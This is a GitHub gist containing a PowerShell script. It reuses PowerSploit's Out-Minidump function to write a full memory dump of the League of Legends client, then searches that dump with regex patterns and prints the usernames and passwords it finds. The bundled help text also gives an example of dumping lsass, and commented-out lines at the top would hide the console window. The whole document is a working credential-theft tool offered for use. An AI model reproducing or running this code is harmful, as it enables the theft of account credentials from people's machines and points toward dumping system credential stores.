Created
November 23, 2016 16:41
-
-
Save Numbers11/af7aee87e6e6b121b59e03f4515fdd84 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #$t = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);' | |
| #add-type -name win -member $t -namespace native | |
| #[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0) | |
| function Out-Minidump | |
| { | |
| <# | |
| .SYNOPSIS | |
| Generates a full-memory minidump of a process. | |
| PowerSploit Function: Out-Minidump | |
| Author: Matthew Graeber (@mattifestation) | |
| License: BSD 3-Clause | |
| Required Dependencies: None | |
| Optional Dependencies: None | |
| .DESCRIPTION | |
| Out-Minidump writes a process dump file with all process memory to disk. | |
| This is similar to running procdump.exe with the '-ma' switch. | |
| .PARAMETER Process | |
| Specifies the process for which a dump will be generated. The process object | |
| is obtained with Get-Process. | |
| .PARAMETER DumpFilePath | |
| Specifies the path where dump files will be written. By default, dump files | |
| are written to the current working directory. Dump file names take following | |
| form: processname_id.dmp | |
| .EXAMPLE | |
| Out-Minidump -Process (Get-Process -Id 4293) | |
| Description | |
| ----------- | |
| Generate a minidump for process ID 4293. | |
| .EXAMPLE | |
| Get-Process lsass | Out-Minidump | |
| Description | |
| ----------- | |
| Generate a minidump for the lsass process. Note: To dump lsass, you must be | |
| running from an elevated prompt. | |
| .EXAMPLE | |
| Get-Process | Out-Minidump -DumpFilePath C:\temp | |
| Description | |
| ----------- | |
| Generate a minidump of all running processes and save them to C:\temp. | |
| .INPUTS | |
| System.Diagnostics.Process | |
| You can pipe a process object to Out-Minidump. | |
| .OUTPUTS | |
| System.IO.FileInfo | |
| .LINK | |
| http://www.exploit-monday.com/ | |
| #> | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True)] | |
| [System.Diagnostics.Process] | |
| $Process, | |
| [Parameter(Position = 1)] | |
| [ValidateScript({ Test-Path $_ })] | |
| [String] | |
| $DumpFilePath = $PWD | |
| ) | |
| BEGIN | |
| { | |
| $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') | |
| $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') | |
| $Flags = [Reflection.BindingFlags] 'NonPublic, Static' | |
| $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) | |
| $MiniDumpWithFullMemory = [UInt32] 2 | |
| } | |
| PROCESS | |
| { | |
| $ProcessId = $Process.Id | |
| $ProcessName = $Process.Name | |
| $ProcessHandle = $Process.Handle | |
| $ProcessFileName = "$($ProcessName).dmp" | |
| $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName | |
| $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) | |
| $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, | |
| $ProcessId, | |
| $FileStream.SafeFileHandle, | |
| $MiniDumpWithFullMemory, | |
| [IntPtr]::Zero, | |
| [IntPtr]::Zero, | |
| [IntPtr]::Zero)) | |
| $FileStream.Close() | |
| if (-not $Result) | |
| { | |
| $Exception = New-Object ComponentModel.Win32Exception | |
| $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))" | |
| # Remove any partially written dump files. For example, a partial dump will be written | |
| # in the case when 32-bit PowerShell tries to dump a 64-bit process. | |
| Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue | |
| throw $ExceptionMessage | |
| } | |
| else | |
| { | |
| Get-ChildItem $ProcessDumpPath | |
| } | |
| } | |
| END {} | |
| } | |
| function Extract-Lol | |
| { | |
| <# | |
| .SYNOPSIS | |
| Tries to extract the League of Legends password from the new Lol Client's process memory | |
| .DESCRIPTION | |
| It might work maybe | |
| .EXAMPLE | |
| PS C:\>Extract-Lol | |
| #> | |
| $pattern_user = [regex] '"account_name": "[\x20-\x7E]{1,22}"' | |
| $pattern_pass = [regex] 'AIR_[\x20-\x7E]{1,16}' | |
| function Seek($inFile, [Int32] $bufSize){ | |
| $stream = [System.IO.File]::OpenRead($inFile) | |
| $chunkNum = 1 | |
| $barr = New-Object byte[] $bufSize | |
| while( $bytesRead = $stream.Read($barr,0,$bufSize)){ | |
| Write-Output "Seeking through chunk $chunkNum" | |
| $ArrayPtr = [System.Runtime.InteropServices.Marshal]::UnsafeAddrOfPinnedArrayElement($barr, 0) | |
| $RawString = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($ArrayPtr, $barr.Length) | |
| $Results = $pattern_user.Matches($RawString) | |
| if ($Results.count -gt 0) | |
| { | |
| $len = $Results.count | |
| for($i=0;$i-lt$len;$i++){ | |
| Write-Output "Username found:" | |
| Write-Output $Results[$i].Value.substring(17).TrimEnd('"') | |
| Write-Output '-------------------------------' | |
| Write-Output `r | |
| } | |
| } | |
| $Results = $pattern_pass.Matches($RawString) | |
| if ($Results.count -gt 0) | |
| { | |
| $len = $Results.count | |
| for($i=0;$i-lt$len;$i++){ | |
| Write-Output "Password found:" | |
| Write-Output $Results[$i].Value.substring(4) | |
| Write-Output '-------------------------------' | |
| Write-Output `r | |
| } | |
| } | |
| #} | |
| $chunkNum += 1 | |
| } | |
| $stream.close() | |
| } | |
| $proc = Get-Process -Name LeagueClient | |
| if ($proc) { | |
| Write-Output "Waiting for dump to be written ..." | |
| $dumpfile = Out-Minidump -Process $proc -DumpFilePath $env:temp | |
| #Start-Sleep -seconds 10 | |
| Write-Output "Seeking through dump ..." | |
| Seek $dumpfile 100000000 | |
| Remove-Item $dumpfile | |
| [gc]::collect() #try to free up all that mem shizzle | |
| } | |
| } | |
| Extract-Lol |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment